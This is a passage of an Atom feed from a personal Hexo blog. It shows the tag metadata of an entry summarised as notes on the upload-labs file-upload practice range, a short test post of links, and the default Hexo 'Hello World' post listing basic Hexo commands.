<summary type="html"><p>Some notes and a summary written after finishing the upload-labs file-upload practice range</p></summary>
<category term="upload-labs" scheme="http://example.com/tags/upload-labs/"/>
<category term="note" scheme="http://example.com/tags/note/"/>
<category term="file upload" scheme="http://example.com/tags/file-upload/"/>
</entry>
<entry>
<title>try</title>
<link href="http://example.com/2022/07/11/try/"/>
<id>http://example.com/2022/07/11/try/</id>
<published>2022-07-11T11:07:51.000Z</published>
<updated>2022-07-11T14:50:17.458Z</updated>
<content type="html"><![CDATA[<p><a href="http://zhihu.com/">Zhihu</a><br><a href="http://baidu.com/">Baidu</a></p>]]></content>
<summary type="html"><p>This is a test and also a beginning (๑•̀ㅂ•́)و✧</p></summary>
<category term="hexo" scheme="http://example.com/tags/hexo/"/>
<category term="test" scheme="http://example.com/tags/test/"/>
<category term="md" scheme="http://example.com/tags/md/"/>
</entry>
<entry>
<title>Hello World</title>
<link href="http://example.com/2022/07/11/hello-world/"/>
<id>http://example.com/2022/07/11/hello-world/</id>
<published>2022-07-11T08:24:20.972Z</published>
<updated>2022-07-11T14:10:14.414Z</updated>
<content type="html"><![CDATA[<p>Welcome to <a href="https://hexo.io/">Hexo</a>! This is your very first post. Check <a href="https://hexo.io/docs/">documentation</a> for more info. If you get any problems when using Hexo, you can find the answer in <a href="https://hexo.io/docs/troubleshooting.html">troubleshooting</a> or you can ask me on <a href="https://github.com/hexojs/hexo/issues">GitHub</a>.</p><h2 id="Quick-Start"><a href="#Quick-Start" class="headerlink" title="Quick Start"></a>Quick Start</h2><h3 id="Create-a-new-post"><a href="#Create-a-new-post" class="headerlink" title="Create a new post"></a>Create a new post</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ hexo new <span class="string">"My New Post"</span></span><br></pre></td></tr></table></figure><p>More info: <a href="https://hexo.io/docs/writing.html">Writing</a></p><h3 id="Run-server"><a href="#Run-server" class="headerlink" title="Run server"></a>Run server</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ hexo server</span><br></pre></td></tr></table></figure><p>More info: <a href="https://hexo.io/docs/server.html">Server</a></p><h3 id="Generate-static-files"><a href="#Generate-static-files" class="headerlink" title="Generate static files"></a>Generate static files</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ hexo generate</span><br></pre></td></tr></table></figure><p>More info: <a href="https://hexo.io/docs/generating.html">Generating</a></p><h3 id="Deploy-to-remote-sites"><a href="#Deploy-to-remote-sites" class="headerlink" title="Deploy to remote sites"></a>Deploy to remote sites</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span 
class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ hexo deploy</span><br></pre></td></tr></table></figure><p>More info: <a href="https://hexo.io/docs/one-command-deployment.html">Deployment</a></p>]]></content>
<summary type="html"><p>Welcome to <a href="https://hexo.io/">Hexo</a>! This is your very first post. Check <a href="https://hexo.io/docs/">documentation</a> for</summary>
<category term="instrustion" scheme="http://example.com/tags/instrustion/"/>
<category term="hexo" scheme="http://example.com/tags/hexo/"/>
</entry>
</feed>